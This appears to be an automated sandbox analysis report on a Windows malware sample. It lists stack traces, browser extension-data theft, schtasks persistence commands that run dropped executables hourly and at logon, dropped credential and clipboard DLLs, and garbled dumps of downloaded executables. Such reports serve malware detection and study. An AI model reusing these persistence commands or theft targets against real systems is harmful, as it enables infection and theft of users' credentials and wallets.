WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 107606260
registers.edi: 80984724
registers.eax: 107606260
registers.ebp: 107606340
registers.edx: 3539128
registers.ebx: 107606624
registers.esi: 2147746133
registers.ecx: 80873032

__exception__

Jan. 20, 2024, 6:11 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 73128512
registers.edi: 1974991376
registers.eax: 73128512
registers.ebp: 73128592
registers.edx: 1
registers.ebx: 5373908
registers.esi: 2147746133
registers.ecx: 3862202768

Steals private information from local Internet browsers (50 out of 4026 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\XhlUBuzr_erltjsCc2i8.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\nMwYVOGnAUUKXSussjvl.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\BjNbQTa_ebXggk2TL4BU.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\G2ldKV13OLUoACudPq3i.exe
file	C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe

Creates a suspicious process (6 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (6 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\nMwYVOGnAUUKXSussjvl.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\G2ldKV13OLUoACudPq3i.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\XhlUBuzr_erltjsCc2i8.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe
file	C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\G2ldKV13OLUoACudPq3i.exe
file	C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\nMwYVOGnAUUKXSussjvl.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\XhlUBuzr_erltjsCc2i8.exe

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Jan. 20, 2024, 6:10 p.m.	thread_identifier: 2428 thread_handle: 0x00000140 process_identifier: 2424 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000144	1	1
CreateProcessInternalW Jan. 20, 2024, 6:10 p.m.	thread_identifier: 2536 thread_handle: 0x0000014c process_identifier: 2532 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000148	1	1
CreateProcessInternalW Jan. 20, 2024, 6:10 p.m.	thread_identifier: 2692 thread_handle: 0x00000468 process_identifier: 2688 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000464	1	1
CreateProcessInternalW Jan. 20, 2024, 6:10 p.m.	thread_identifier: 2752 thread_handle: 0x0000046c process_identifier: 2748 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000045c	1	1
ShellExecuteExW Jan. 20, 2024, 6:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe	1	1
ShellExecuteExW Jan. 20, 2024, 6:10 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Jan. 20, 2024, 6:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe	1	1
ShellExecuteExW Jan. 20, 2024, 6:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe	1	1
ShellExecuteExW Jan. 20, 2024, 6:11 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)

Time & API	Arguments	Status	Return
Process32NextW Jan. 20, 2024, 6:10 p.m.	snapshot_handle: 0x0000048c process_name: SearchFilterHost.exe process_identifier: 808	1	1
Process32NextW Jan. 20, 2024, 6:10 p.m.	snapshot_handle: 0x0000048c process_name: mscorsvw.exe process_identifier: 2296	1	1
Process32NextW Jan. 20, 2024, 6:10 p.m.	snapshot_handle: 0x0000048c process_name: conhost.exe process_identifier: 2440	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05910000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the processes zonak.exe, explorhe.exe (7 events)

Time & API	Arguments	Status	Return
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELû«eà"¬ LwÀ @`#¡@@@d\|@ @à uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc@@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%3%3%hM=%hM%hM %æH!%æH'%æHF%hM"%3%ã%¨K2%¨Ko2%¨K2%Rich3%PELlÖeà °]@ @@@8Ð6`ðØ(Ð6`´8Ð6<@à j@@àP@ ª@à´@àP ´@à.rsrcð´@àÐ/¶@à.data° Ð6¤ ¶@à¨<Bô³Ô5Rv¯«ÊkQöhZ¢¹é£¯:çÜjSßeæ4{-]¦¾jÒ_MÕGíVë<lVAH»+ßAý?©Ôî¨,#e×õS#²<:Õ<m¥ÞgxÁwÜêRr`¬ Ö¾nM2ÈuÜÌ[ÏaB2åÉUJÊ9níFòh'hjñõ4ÔÓÃ/z^ò¯£¦ÝÔi-HÐ?êÒß«~î{_qß&C-¥ôÜ1ÌëÐ!ö$ögKÁhÓløßç£OµýÝâò¼æàýÕ¯ !Ùfá7ÇG¡ïÞIÁ·ãú}08EÙÀUåÜ©cuf²æXab÷sj¬çã÷3yîÉª²"J\|X;Û8á"«Ö Ã k¶½åçTKè¥<¹Ô¿U4Av´>Zhq®Ù½' ×ÊVKÀ8Q[pd¡O®À³@eñÜO\|ïNÁW£hm¨áã&®wÏÂxÌ:ñ®èÔä-ÊznîòÕ¼ÃÎ<SÆcGÅzòî¸ÔN;¨üüË6fm¶1(²ª1#AþyA°W:)vF~w!9v 1<ã»s,F×år>÷ÀÄ(êg¼u6W;Åõ.§ì,+úbRjV¾²X7 (ö@âjÙú=ï;U¼!ÔP6V#5?Ä¢n£6QÔ7^È¦ÆÁ÷×±úÍêð¿^¼¸N¤+a¶Ø`2H»ÜupÌKdTeí°3.åë=òà>ZFæéÉ:8Ks°:Çµ}ÓìÄ_0<Û/ qÜyîªç±ÁÝ?;ªðº_ä®Ø)çT4-ä} MÜ0PY7è³Nq #Emà3TrÖ±)ZhÇ¢GA(d%Å+§û#üÙä{áýg RÀ>«ÍJ¬N××5 kXx¦¡yKkv:ªWÌ)Ùt,Ö `·§àF-¥ú¿¼íßA43<WSñpôwß¹ò5½DOföÑ]°UÝh^ç@B#1é¤³"®&©iöQÏu)ÏÙ¤Ýw¬hL~®ÝÔ`E{qeíLÇ«ìÇÿ½¨aâIkéË8í¶èËZÜ\ê_w°#³èïÀdW±uÄ ¶Mì²Ã2Ò×E'Sbó¦E 6p{ùï±³¯¨îI.ÇIg¼!ÑµÙm¬æ.¼ÜÉ@ÕèQ¦+ïßÓÆê$âF¢Çáj &¦*Ajÿc request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà.0æ^ @ ``K @È H.textdå æ `.rsrc è@@.reloc@î@B@HhWÞ`$0]+(², 0~:K( è s ( þþ ( ( ?rps z6+(OâWJ(N+(ÉHK5(( j+('uk(( }0@s @ (&0i ?( ~ ( :K ~ÊÀ b "WDäa~h{a(3( %(& Ð( (&(&0( ~ 8c o ËOP (ãpa~h{ma(3( 90 o (:(&( o (&Xi?ÿÿÿ(&0( ~ 8d o í§¯l ÊX ZÈhqa~h{¢a(3( 9+ o (:(& o (&Xi?ÿÿÿ(&0 e ?( ~ ( :G.( þ%(&%~ ( & Ð( (&(&0_~ o :~ o! o" 8o# ; o" Ý 9o$ ÜÝ&Ý 9F XX0Ô(((( CÍ /P>a~h{ra(3( PBN jjS;a~h{]a(3 }¯·k c Ã¯a~h{Ha(3 Hu ü OÓj¨a~h{a(3( È@f ;Aëa~h{a(3 ¶'D g-a~h{Wa(3 ñ¿O ©¢^Y ånT a~h{a(3( µ¤"ë {¶bÎa~h{ra(3 ¶ðþ5 ÚläÁX oâa~h{a(3 ÈÞ5 Ã^dY [Oa~h{fa(3( öòø8 yüéEa~h{¢a(3 äxäÛ &u^¹X ¥Ma~h{a(3 È@f 9áwa~h{ra(3( Ò£ Ò²a~h{a(3 PBN o[a~h{a(3 >ú. <~hka~h{a(3( ãÐf? c 7Ka~h{a(3 K:BÂ b ûß`a~h{J request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈTô¶Qà@ÐQ@àGPì´àG¨¢8Ð°@àÀà@´@à@ ô@àÀàü@à° þ@à.rsrcÀP¶þ@àÐ/´ @à.datað àGî ´ @à{3k¤¦Yî¿r\Á/$LPÈ½%ÇÎüâ[þº 'zeºbîæ¼9õb8ÑÚ6v}LUªôÙ 3XF¢}UØxè¥h+Å×»Ó(æÔ°)ÃÛu5ÕêïV6²9àOrGñÝ²K\¬=wBû%<7,0!®ÙgI«Á³þuäåNnµñõ=@C4½É´é F»JnìÇ]²lÏµ.Ý)è´nð ~ñ°õ½3ø\½C_àï:5¹¾Ö"ROãôV(¥ÍQmuÆõÐ·ÛU(+ÃØ·G¦¾ºB"÷n.%þÜH ÔØþÑLlÉcúîænCø@¨N¯U6?T@Â³7í wMÉ crÂÍ@MõñÆ~§åî^2Áª»$fº¡7ëòp¯ªÆCï¸HÜõ´F¼¤µ½²9á³/ýf¸¥æ¾å¥Úñ2-mÔkfK\|ãÍtØ #aGÞç>D.pDô¤ÇôsÅáÐK5XWÓ³¿SÞX jÐ&Ø\óe]³üô^È'¼_²¬Ü<Lÿ õhP\|º\3_ ÝaåëZÄûK§F?úª¬÷æà×,R[¼æ©G§ó¢Ãa$+ç¿^b:ùo##iûfÛL 1¾a< 2uî?#2ôôòÿõ\|&ç¸'Ö6Aº"ï¼}i"PçX\|üfC©[ò¸ð×¶¦¾l±Y p\|ÔÇo*çò¦Ä2¾>X²§oÏ¾xÞYrg¡øá Ç}"jãêl!)âoù 